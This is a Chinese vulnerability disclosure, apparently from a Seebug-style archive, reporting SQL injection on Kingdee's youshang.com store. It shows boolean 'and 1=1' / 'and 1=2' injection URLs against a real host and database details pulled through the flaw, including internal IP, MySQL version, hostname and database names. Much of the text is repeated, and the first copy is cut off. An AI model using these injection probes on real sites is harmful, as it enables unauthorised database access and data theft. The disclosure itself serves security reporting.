### 简要描述: 金蝶友商网存在SQL注入漏洞 ### 详细说明: 金蝶友商网存在SQL注入漏洞,可以得出相关数据表及记录。 ### 漏洞证明: 输入1=1得出: http://store.youshang.com/show.php?id=81738%20and%201=1 [<img src="https://images.seebug.org/upload/201204/01154743410682f03518f158b49d22659fdced5f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/01154743410682f03518f158b49d22659fdced5f.jpg) 输入1=2得出: http://store.youshang.com/show.php?id=81738%20and%201=2 [<img src="https://images.seebug.org/upload/201204/011548315a2e3ae1eac07140b2edfd7b7461fe96.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/011548315a2e3ae1eac07140b2edfd7b7461fe96.jpg) 数据库相关信息: Current User: youshangportal@192.168.30.114 Sql Version: 5.0.77-log Current DB: youshangportal System User: youshangportal@192.168.30.114 Host Name: REDHAT64BI Installation dir: /usr/local/mysql/ DB User: 'youshangportal'@'%' Data Bases: information_schema test youshangportal ysproject 相关表明: [<img...
### 简要描述: 金蝶友商网存在SQL注入漏洞 ### 详细说明: 金蝶友商网存在SQL注入漏洞,可以得出相关数据表及记录。 ### 漏洞证明: 输入1=1得出: http://store.youshang.com/show.php?id=81738%20and%201=1 [<img src="https://images.seebug.org/upload/201204/01154743410682f03518f158b49d22659fdced5f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/01154743410682f03518f158b49d22659fdced5f.jpg) 输入1=2得出: http://store.youshang.com/show.php?id=81738%20and%201=2 [<img src="https://images.seebug.org/upload/201204/011548315a2e3ae1eac07140b2edfd7b7461fe96.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/011548315a2e3ae1eac07140b2edfd7b7461fe96.jpg) 数据库相关信息: Current User: youshangportal@192.168.30.114 Sql Version: 5.0.77-log Current DB: youshangportal System User: youshangportal@192.168.30.114 Host Name: REDHAT64BI Installation dir: /usr/local/mysql/ DB User: 'youshangportal'@'%' Data Bases: information_schema test youshangportal ysproject 相关表明: [<img src="https://images.seebug.org/upload/201204/01155000bf9dff22e25757f57c4f6057d3bfebad.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/01155000bf9dff22e25757f57c4f6057d3bfebad.jpg) [<img src="https://images.seebug.org/upload/201204/01155614a319d00f4df7bb21ddec99f11eefe194.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/01155614a319d00f4df7bb21ddec99f11eefe194.jpg)